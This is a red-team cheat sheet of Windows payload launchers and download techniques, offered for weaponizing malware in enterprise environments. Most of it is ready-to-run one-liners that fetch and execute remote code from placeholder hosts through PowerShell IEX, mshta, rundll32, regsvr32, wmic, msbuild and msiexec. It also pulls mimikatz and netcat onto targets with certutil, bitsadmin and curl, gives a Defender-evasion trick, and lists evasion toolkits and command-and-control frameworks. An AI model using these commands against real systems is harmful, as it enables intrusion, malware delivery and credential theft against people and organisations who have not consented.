
A curated list of tools and techniques written from experience in weaponization of malware

Weaponziation: Malware Exploitation

A curated list of tools and techniques written from experience in red teaming and weaponization of malware used in enterprise environments to trigger attacker exploitation code.

Code Execution Methods / Launchers

The methods outlined below are used to execute payloads on a local machine, hosted from a remote server or ran in memory.


Endless methods here, lots of obfuscation techniques, just test and choose one that works in your environment

Basic example to execute in memory:

powershell -nop -c IEX(New-Object Net.WebClient).DownloadString('https://Domain.com/Payload.ps1')
powershell -c IEX (IWR https://Domain.com/Payload.ps1')

Powershell from a WebDAV server:

powershell -exec bypass -f \\webdavserver\folder\payload.ps1

PowerLine - Compile EXE then transfer it to victim machine to execute Powershell commands without Powershell.exe. It has to be compiled with the scripts you wish to load within the config (i.e. PowerUp.ps1, Invoke-Mimikatz.ps1, etc.).

PowerLine.exe -ShowScripts
PowerLine.exe PowerUp "Invoke-AllChecks"

Mshta (HTA)

Microsoft binary to execute HTML Application (HTA) files or inline scripts. Frameworks like Empire, Metasploit and Unicorn all output HTA payload file formats.

1. mshta vbscript:Close(Execute("GetObject(""script:http://WebServer/payload.sct"")"))
2. mshta https://WebServer/payload.hta
3. mshta \\WebDAVserver\folder\payload.hta


Microsoft binary to execute code inside a .DLL file. Custom .DLLs can be written in languages such as Csharp to fully bypass detection.

rundll32 C:\yourfile.dll,EntryPoint 
--> yourfile.dll is your malicious .DLL
--> EntryPoint is the function called within the .DLL

Run inline VBscript:

rundll32 vbscript:"\..\mshtml,RunHTMLApplication "+String(CreateObject("WScript.Shell").Run("Wscript.Echo ""Hi there!"""),0)

Run remote SCT payload:

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://WebServer/payload.sct");window.close();


Windows .NET executable for building and executing custom Csharp project files on the fly. Running local payload XML or Csproj files:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe Payload.xml

WebDAV server hosted to run in memory:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe \\WebDAVserver\Payload.xml


Windows command-line tool to register and unregister dll files. Can be used to bypass some controls such as AppLocker

Method 1: Web server delivery. Written on disk in IE local cache. Command to run on target machine:

regsvr32 /u /n /s /i:http://yourdomain.com/payload.sct scrobj.dll

Method 2: WebDAV server. Written on disk in WebDAV client local cache. Command to run on target machine:

regsvr32 /u /n /s /i:\\WebDavServer\tmp\payload.sct scrobj.dll


Use Wmic to execute a local or remote XSL (eXtensible Stylesheet Language) file which contains scripting

Execute local/remote file: 
wmic os get /format:"https://yourdomain/payload.xsl"

Exeucte some command:
wmic process call create "cmd.exe /c shell.exe"

Cscript / Wscript

Both executables are part of the Windows Script Host (WSH) which is used for scripting capabilities. Cscript.exe allows for execution of VBS, JS, and WSH scripts entirely in command-line. Wscript.exe does the same pup pops up a Windows dialoge box for user interaction.

1. Run locally
cscript.exe testscript.vbs

2. WebDav server
cscript //E:jscript \\WebDavServer\folder\payload.vbs


Windows comes with a Windows installer engine for MSI packages to install new apps called Msiexec.exe. Malicious .msi files can be created to execute payloads

msiexec /q /i http://YourDomain/payload.msi

Payload Downloading and Delivery Methods

The methods listed below are used to transfer and download remote files onto target machines.

Windows oneliners to download remote payload and execute arbitrary code


The most pervasive method these days which may be monitoried from blue team, logged for later analysis and possibly blocked in some environments.

SANS Powershell one-liners

# DownloadFile method
powershell -c (New-Object System.Net.WebClient).DownloadFile("https://example.com/archive.zip", "%temp%\archive.zip")

# Invoke-WebRequest method
powershell -c IWR "https://example.com/mimikatz.exe" -OutFile ".\mimikatz.exe" 

# Wget in Powershell (Windows 8 and later)
PS# wget "http://www.yourdomain.com/file.exe" -outfile "OutputFile.exe"


Linux and Windows 10 (build #17063 and later) operating systems tool to bypass controls Reference: https://medium.com/@reegun/curl-exe-is-the-new-rundll32-exe-lolbin-3f79c5f35983

curl -o nc.exe https://yourdomain.com/nc.exe


Windows built-in binary for downloading remote files, encoding and decoding them. Blocked on recent builds of Windows 10 with Defender.

certutil -urlcache -f https://download.sysinternals.com/files/PSTools.env pstools.env
certutil -decode pstools.env pstools.zip


Windows command-line utility for managing BITS jobs and transferring files. Blocked by modern Windows 10 Defender but can be copied to another EXE to bypass.

Basic example:

bitsadmin /transfer job https://Domain.com/Payload.ps1 Payload.ps1

Method to bypass Win 10 Defender by copying "bitsadmin.exe" to a separate file for execution:

copy /Y C:\Windows\System32\bitsadmin.exe %temp%\Update.exe
%temp%\Update.exe /transfer newjob https://Domain.com/mimikatz.exe %temp%\mimikatz.exe

PowerShell method:

PS# Start-BitsTransfer https://Domain.com/mimikatz.exe %temp%\mimikatz.exe

Tool kits

  • Veil Evasion: Generate Metasploit based payloads. Includes payload type and encoding options.
  • Lucky Strike: PowerShell tool for creating malicious Macro documents.
  • Shellter: Automated anti-virus evasion toolkit for payload development.
  • Magic Unicorn: Python script by TrustedSec (Dave Kennedy) to generate Powershell commands and payloads as well as various file type payloads (HTA, Marcro, Certutil). It also accepts Cobalt Strike shellcode payloads in C#.

Red teaming Frameworks

  • Powershell Empire: Post-exploitation framework built in Powershell for setting up Listeners, receiving connecting Agents, executing payload Modules and more.
  • Cobalt Strike: Red teaming framework of choice for many professionals. Costly but effective.
  • Covanent: Open source framework from the makers of Cobalt Strike. Created in C# (.NET Core). Runs and interacts in a similar fashion to Powershell Empire.
  • Metasploit: Standard Kali Linux framework, used by hackers, pentesters and script-kiddies alike.